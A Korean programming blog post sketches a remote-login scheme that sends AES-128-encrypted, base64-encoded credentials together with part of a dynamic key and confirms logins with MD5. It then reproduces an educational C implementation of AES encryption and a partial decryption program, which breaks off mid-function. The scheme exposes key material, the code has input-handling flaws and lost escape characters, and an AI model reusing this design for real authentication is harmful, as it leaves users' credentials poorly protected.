메뉴 건너뛰기

imp

[C++] AES-128 활용 원격 로그인 구현

lispro062014.07.25 02:15조회 수 1913댓글 0

    • 글자 크기

계획은 이렇다.


받은 ID, PW를 asc2hex로 변환한다.


C/S 프로그램에서 AES 128로 암호화한 ID, PW를 base64로 인코딩해 보낸다.


이 때, 동적 키 값의 일부를 같이 보낸다.(얼마나 보낼지가....)


서버에서 base64 디코딩한 id, pw를 파싱해 복호화한 값을 php에서 처리해 인증한다.


인증에 문제가 없으면, 동적 키값과 다른 정보를 조합한 md5값을 보낸다.


클라이언트에서는 역시 동적 키 값과 다른 정보가 조합된 md5값을 비교한다.


http://comp.ist.utl.pt/ec-csc/Code/Ciphers/




/*

******************************************************************

**       Advanced Encryption Standard implementation in C.      **

**       By Niyaz PK                                            **

**       E-mail: niyazlife@gmail.com                            **

**       Downloaded from Website: www.hoozi.com                 **

******************************************************************

This is the source code for encryption using the latest AES algorithm.

AES algorithm is also called Rijndael algorithm. AES algorithm is 

recommended for non-classified by the National Institute of Standards 

and Technology(NIST), USA. Now-a-days AES is being used for almost 

all encryption applications all around the world.


THE MAIN FEATURE OF THIS AES ENCRYPTION PROGRAM IS NOT EFFICIENCY; IT

IS SIMPLICITY AND READABILITY. THIS SOURCE CODE IS PROVIDED FOR ALL

TO UNDERSTAND THE AES ALGORITHM.


Comments are provided as needed to understand the program. But the 

user must read some AES documentation to understand the underlying 

theory correctly.


It is not possible to describe the complete AES algorithm in detail 

here. For the complete description of the algorithm, point your 

browser to:

http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf


Find the Wikipedia page of AES at:

http://en.wikipedia.org/wiki/Advanced_Encryption_Standard

******************************************************************

*/


// Include stdio.h for standard input/output.

// Used for giving output to the screen.

#include<stdio.h>

#include<iostream>

#include<fstream>

#include<stdlib.h>


// The number of columns comprising a state in AES. This is a constant in AES. Value=4

#define Nb 4


// The number of rounds in AES Cipher. It is simply initiated to zero. The actual value is recieved in the program.

int Nr=0;


// The number of 32 bit words in the key. It is simply initiated to zero. The actual value is recieved in the program.

int Nk=0;


// in - it is the array that holds the plain text to be encrypted.

// out - it is the array that holds the key for encryption.

// state - the array that holds the intermediate results during encryption.

unsigned char in[16], out[16], state[4][4];


// The array that stores the round keys.

unsigned char RoundKey[240];


// The Key input to the AES Program

unsigned char Key[32];


int getSBoxValue(int num)

{

int sbox[256] =   {

//0     1    2      3     4    5     6     7      8    9     A      B    C     D     E     F

0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, //0

0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, //1

0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, //2

0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, //3

0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, //4

0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, //5

0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, //6

0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, //7

0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, //8

0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, //9

0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, //A

0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, //B

0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, //C

0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, //D

0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, //E

0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 }; //F

return sbox[num];

}


// The round constant word array, Rcon[i], contains the values given by 

// x to th e power (i-1) being powers of x (x is denoted as {02}) in the field GF(28)

// Note that i starts at 1, not 0).

int Rcon[255] = {

0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 

0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 

0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 

0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 

0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 

0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 

0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 

0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 

0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 

0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 

0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 

0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 

0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 

0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 

0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 

0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb  };


// This function produces Nb(Nr+1) round keys. The round keys are used in each round to encrypt the states. 

void KeyExpansion()

{

int i,j;

unsigned char temp[4],k;

// The first round key is the key itself.

for(i=0;i<Nk;i++)

{

RoundKey[i*4]=Key[i*4];

RoundKey[i*4+1]=Key[i*4+1];

RoundKey[i*4+2]=Key[i*4+2];

RoundKey[i*4+3]=Key[i*4+3];

}


// All other round keys are found from the previous round keys.

while (i < (Nb * (Nr+1)))

{

for(j=0;j<4;j++)

{

temp[j]=RoundKey[(i-1) * 4 + j];

}

if (i % Nk == 0)

{

// This function rotates the 4 bytes in a word to the left once.

// [a0,a1,a2,a3] becomes [a1,a2,a3,a0]


// Function RotWord()

{

k = temp[0];

temp[0] = temp[1];

temp[1] = temp[2];

temp[2] = temp[3];

temp[3] = k;

}


// SubWord() is a function that takes a four-byte input word and 

// applies the S-box to each of the four bytes to produce an output word.


// Function Subword()

{

temp[0]=getSBoxValue(temp[0]);

temp[1]=getSBoxValue(temp[1]);

temp[2]=getSBoxValue(temp[2]);

temp[3]=getSBoxValue(temp[3]);

}


temp[0] =  temp[0] ^ Rcon[i/Nk];

}

else if (Nk > 6 && i % Nk == 4)

{

// Function Subword()

{

temp[0]=getSBoxValue(temp[0]);

temp[1]=getSBoxValue(temp[1]);

temp[2]=getSBoxValue(temp[2]);

temp[3]=getSBoxValue(temp[3]);

}

}

RoundKey[i*4+0] = RoundKey[(i-Nk)*4+0] ^ temp[0];

RoundKey[i*4+1] = RoundKey[(i-Nk)*4+1] ^ temp[1];

RoundKey[i*4+2] = RoundKey[(i-Nk)*4+2] ^ temp[2];

RoundKey[i*4+3] = RoundKey[(i-Nk)*4+3] ^ temp[3];

i++;

}

}


// This function adds the round key to state.

// The round key is added to the state by an XOR function.

void AddRoundKey(int round) 

{

int i,j;

for(i=0;i<4;i++)

{

for(j=0;j<4;j++)

{

state[j][i] ^= RoundKey[round * Nb * 4 + i * Nb + j];

}

}

}


// The SubBytes Function Substitutes the values in the

// state matrix with values in an S-box.

void SubBytes()

{

int i,j;

for(i=0;i<4;i++)

{

for(j=0;j<4;j++)

{

state[i][j] = getSBoxValue(state[i][j]);


}

}

}


// The ShiftRows() function shifts the rows in the state to the left.

// Each row is shifted with different offset.

// Offset = Row number. So the first row is not shifted.

void ShiftRows()

{

unsigned char temp;


// Rotate first row 1 columns to left

temp=state[1][0];

state[1][0]=state[1][1];

state[1][1]=state[1][2];

state[1][2]=state[1][3];

state[1][3]=temp;


// Rotate second row 2 columns to left

temp=state[2][0];

state[2][0]=state[2][2];

state[2][2]=temp;


temp=state[2][1];

state[2][1]=state[2][3];

state[2][3]=temp;


// Rotate third row 3 columns to left

temp=state[3][0];

state[3][0]=state[3][3];

state[3][3]=state[3][2];

state[3][2]=state[3][1];

state[3][1]=temp;

}


// xtime is a macro that finds the product of {02} and the argument to xtime modulo {1b}  

#define xtime(x)   ((x<<1) ^ (((x>>7) & 1) * 0x1b))


// MixColumns function mixes the columns of the state matrix

void MixColumns()

{

int i;

unsigned char Tmp,Tm,t;

for(i=0;i<4;i++)

{

t=state[0][i];

Tmp = state[0][i] ^ state[1][i] ^ state[2][i] ^ state[3][i] ;

Tm = state[0][i] ^ state[1][i] ; Tm = xtime(Tm); state[0][i] ^= Tm ^ Tmp ;

Tm = state[1][i] ^ state[2][i] ; Tm = xtime(Tm); state[1][i] ^= Tm ^ Tmp ;

Tm = state[2][i] ^ state[3][i] ; Tm = xtime(Tm); state[2][i] ^= Tm ^ Tmp ;

Tm = state[3][i] ^ t ; Tm = xtime(Tm); state[3][i] ^= Tm ^ Tmp ;

}

}


// Cipher is the main function that encrypts the PlainText.

void Cipher()

{

int i,j,round=0;


//Copy the input PlainText to state array.

for(i=0;i<4;i++)

{

for(j=0;j<4;j++)

{

state[j][i] = in[i*4 + j];

}

}


// Add the First round key to the state before starting the rounds.

AddRoundKey(0); 

// There will be Nr rounds.

// The first Nr-1 rounds are identical.

// These Nr-1 rounds are executed in the loop below.

for(round=1;round<Nr;round++)

{

SubBytes();

ShiftRows();

MixColumns();

AddRoundKey(round);

}

// The last round is given below.

// The MixColumns function is not here in the last round.

SubBytes();

ShiftRows();

AddRoundKey(Nr);


// The encryption process is over.

// Copy the state array to output array.

for(i=0;i<4;i++)

{

for(j=0;j<4;j++)

{

out[i*4+j]=state[j][i];

}

}

}

int main()

{

int i;


// Recieve the length of key here.

while(Nr!=128 && Nr!=192 && Nr!=256)

{

printf("Enter the length of Key(128, 192 or 256 only): ");

scanf("%d",&Nr);

}

// Calculate Nk and Nr from the recieved value.

Nk = Nr / 32;

Nr = Nk + 6;




// Part 1 is for demonstrative purpose. The key and plaintext are given in the program itself.

// Part 1: ********************************************************

// The array temp stores the key.

// The array temp2 stores the plaintext.

unsigned char temp[32] = {0x00  ,0x01  ,0x02  ,0x03  ,0x04  ,0x05  ,0x06  ,0x07  ,0x08  ,0x09  ,0x0a  ,0x0b  ,0x0c  ,0x0d  ,0x0e  ,0x0f};

unsigned char temp2[32]= {0x00  ,0x11  ,0x22  ,0x33  ,0x44  ,0x55  ,0x66  ,0x77  ,0x88  ,0x99  ,0xaa  ,0xbb  ,0xcc  ,0xdd  ,0xee  ,0xff};

// Copy the Key and PlainText

for(i=0;i<Nk*4;i++)

{

Key[i]=temp[i];

in[i]=temp2[i];

}


//       *********************************************************





// Uncomment Part 2 if you need to read key and plaintext from the keyboard.

// Part 2: ********************************************************

/*

//Clear the input buffer

flushall();


//Recieve the key from the user

printf("Enter the Key in hexadecimal: ");

for(i=0;i<Nk*4;i++)

{

scanf("%x",&Key[i]);

}

*/

printf("Enter the PlainText in hexadecimal: ");

for(i=0;i<Nb*4;i++)

{

scanf("%x",&in[i]);

}


//        ********************************************************



// The KeyExpansion routine must be called before encryption.

KeyExpansion();


// The next function call encrypts the PlainText with the Key using AES algorithm.

Cipher();


// Output the encrypted text.

printf("nText after encryption:n");

for(i=0;i<Nb*4;i++)

{

printf("%02x ",out[i]);

}

printf("nn");

}






/*
******************************************************************
**       Advanced Encryption Standard implementation in C.      **
**       By Niyaz PK                                            **
**       E-mail: niyazlife@gmail.com                            **
**       Downloaded from Website: www.hoozi.com                 **
******************************************************************
This is the source code for decryption using the latest AES algorithm.
AES algorithm is also called Rijndael algorithm. AES algorithm is 
recommended for non-classified use by the National Institute of Standards 
and Technology(NIST), USA. Now-a-days AES is being used for almost 
all encryption applications all around the world.

THE MAIN FEATURE OF THIS AES ENCRYPTION PROGRAM IS NOT EFFICIENCY; IT
IS SIMPLICITY AND READABILITY. THIS SOURCE CODE IS PROVIDED FOR ALL
TO UNDERSTAND THE AES ALGORITHM.

Comments are provided as needed to understand the program. But the 
user must read some AES documentation to understand the underlying 
theory correctly.

It is not possible to describe the complete AES algorithm in detail 
here. For the complete description of the algorithm, point your 
browser to:
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf

Find the Wikipedia page of AES at:
http://en.wikipedia.org/wiki/Advanced_Encryption_Standard
******************************************************************
*/

// Include stdio.h for standard input/output.
// Used for giving output to the screen.
#include<stdio.h>

// The number of columns comprising a state in AES. This is a constant in AES. Value=4
#define Nb 4

// The number of rounds in AES Cipher. It is simply initiated to zero. The actual value is recieved in the program.
int Nr=0;

// The number of 32 bit words in the key. It is simply initiated to zero. The actual value is recieved in the program.
int Nk=0;

// in - it is the array that holds the CipherText to be decrypted.
// out - it is the array that holds the output of the for decryption.
// state - the array that holds the intermediate results during decryption.
unsigned char in[16], out[16], state[4][4];

// The array that stores the round keys.
unsigned char RoundKey[240];

// The Key input to the AES Program
unsigned char Key[32];

int getSBoxInvert(int num)
{
int rsbox[256] =
{ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d };

return rsbox[num];
}

int getSBoxValue(int num)
{
	int sbox[256] =   {
	//0     1    2      3     4    5     6     7      8    9     A      B    C     D     E     F
	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 };
	return sbox[num];
}

// The round constant word array, Rcon[i], contains the values given by 
// x to th e power (i-1) being powers of x (x is denoted as {02}) in the field GF(2^8)
// Note that i starts at 1, not 0).
int Rcon[255] = {
	0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 
	0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 
	0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 
	0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 
	0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 
	0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 
	0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 
	0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 
	0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 
	0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 
	0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 
	0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 
	0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 
	0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 
	0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 
	0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb  };

// This function produces Nb(Nr+1) round keys. The round keys are used in each round to decrypt the states. 
void KeyExpansion()
{
	int i,j;
	unsigned char temp[4],k;
	
	// The first round key is the key itself.
	for(i=0;i<Nk;i++)
	{
		RoundKey[i*4]=Key[i*4];
		RoundKey[i*4+1]=Key[i*4+1];
		RoundKey[i*4+2]=Key[i*4+2];
		RoundKey[i*4+3]=Key[i*4+3];
	}

	// All other round keys are found from the previous round keys.
	while (i < (Nb * (Nr+1)))
	{
		for(j=0;j<4;j++)
		{
			temp[j]=RoundKey[(i-1) * 4 + j];
		}
		if (i % Nk == 0)
		{
			// This function rotates the 4 bytes in a word to the left once.
			// [a0,a1,a2,a3] becomes [a1,a2,a3,a0]

			// Function RotWord()
			{
				k = temp[0];
				temp[0] = temp[1];
				temp[1] = temp[2];
				temp[2] = temp[3];
				temp[3] = k;
			}

			// SubWord() is a function that takes a four-byte input word and 
			// applies the S-box to each of the four bytes to produce an output word.

			// Function Subword()
			{
				temp[0]=getSBoxValue(temp[0]);
				temp[1]=getSBoxValue(temp[1]);
				temp[2]=getSBoxValue(temp[2]);
				temp[3]=getSBoxValue(temp[3]);
			}

			temp[0] =  temp[0] ^ Rcon[i/Nk];
		}
		else if (Nk > 6 && i % Nk == 4)
		{
			// Function Subword()
			{
				temp[0]=getSBoxValue(temp[0]);
				temp[1]=getSBoxValue(temp[1]);
				temp[2]=getSBoxValue(temp[2]);
				temp[3]=getSBoxValue(temp[3]);
			}
		}
		RoundKey[i*4+0] = RoundKey[(i-Nk)*4+0] ^ temp[0];
		RoundKey[i*4+1] = RoundKey[(i-Nk)*4+1] ^ temp[1];
		RoundKey[i*4+2] = RoundKey[(i-Nk)*4+2] ^ temp[2];
		RoundKey[i*4+3] = RoundKey[(i-Nk)*4+3] ^ temp[3];
		i++;
	}
}

// This function adds the round key to state.
// The round key is added to the state by an XOR function.
void AddRoundKey(int round) 
{
	int i,j;
	for(i=0;i<4;i++)
	{
		for(j=0;j<4;j++)
		{
			state[j][i] ^= RoundKey[round * Nb * 4 + i * Nb + j];
		}
	}
}

// The SubBytes Function Substitutes the values in the
// state matrix with values in an S-box.
void InvSubBytes()
{
	int i,j;
	for(i=0;i<4;i++)
	{
		for(j=0;j<4;j++)
		{
			state[i][j] = getSBoxInvert(state[i][j]);

		}
	}
}

// The ShiftRows() function shifts the rows in the state to the left.
// Each row is shifted with different offset.
// Offset = Row number. So the first row is not shifted.
void InvShiftRows()
{
	unsigned char temp;

	// Rotate first row 1 columns to right	
	temp=state[1][3];
	state[1][3]=state[1][2];
	state[1][2]=state[1][1];
	state[1][1]=state[1][0];
	state[1][0]=temp;

	// Rotate second row 2 columns to right	
	temp=state[2][0];
	state[2][0]=state[2][2];
	state[2][2]=temp;

	temp=state[2][1];
	state[2][1]=state[2][3];
	state[2][3]=temp;

	// Rotate third row 3 columns to right
	temp=state[3][0];
	state[3][0]=state[3][1];
	state[3][1]=state[3][2];
	state[3][2]=state[3][3];
	state[3][3]=temp;
}

// xtime is a macro that finds the product of {02} and the argument to xtime modulo {1b}  
#define xtime(x)   ((x<<1) ^ (((x>>7) & 1) * 0x1b))

// Multiplty is a macro used to multiply numbers in the field GF(2^8)
#define Multiply(x,y) (((y & 1) * x) ^ ((y>>1 & 1) * xtime(x)) ^ ((y>>2 & 1) * xtime(xtime(x))) ^ ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ ((y>>4 & 1) * xtime(xtime(xtime(xtime(x))))))

// MixColumns function mixes the columns of the state matrix.
// The method used to multiply may be difficult to understand for the inexperienced.
// Please use the references to gain more information.
void InvMixColumns()
{
	int i;
	unsigned char a,b,c,d;
	for(i=0;i<4;i++)
	{	
	
		a = state[0][i];
		b = state[1][i];
		c = state[2][i];
		d = state[3][i];

		
		state[0][i] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09);
		state[1][i] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d);
		state[2][i] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b);
		state[3][i] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e);
	}
}

// InvCipher is the main function that decrypts the CipherText.
void InvCipher()
{
	int i,j,round=0;

	//Copy the input CipherText to state array.
	for(i=0;i<4;i++)
	{
		for(j=0;j<4;j++)
		{
			state[j][i] = in[i*4 + j];
		}
	}

	// Add the First round key to the state before starting the rounds.
	AddRoundKey(Nr); 

	// There will be Nr rounds.
	// The first Nr-1 rounds are identical.
	// These Nr-1 rounds are executed in the loop below.
	for(round=Nr-1;round>0;round--)
	{
		InvShiftRows();
		InvSubBytes();
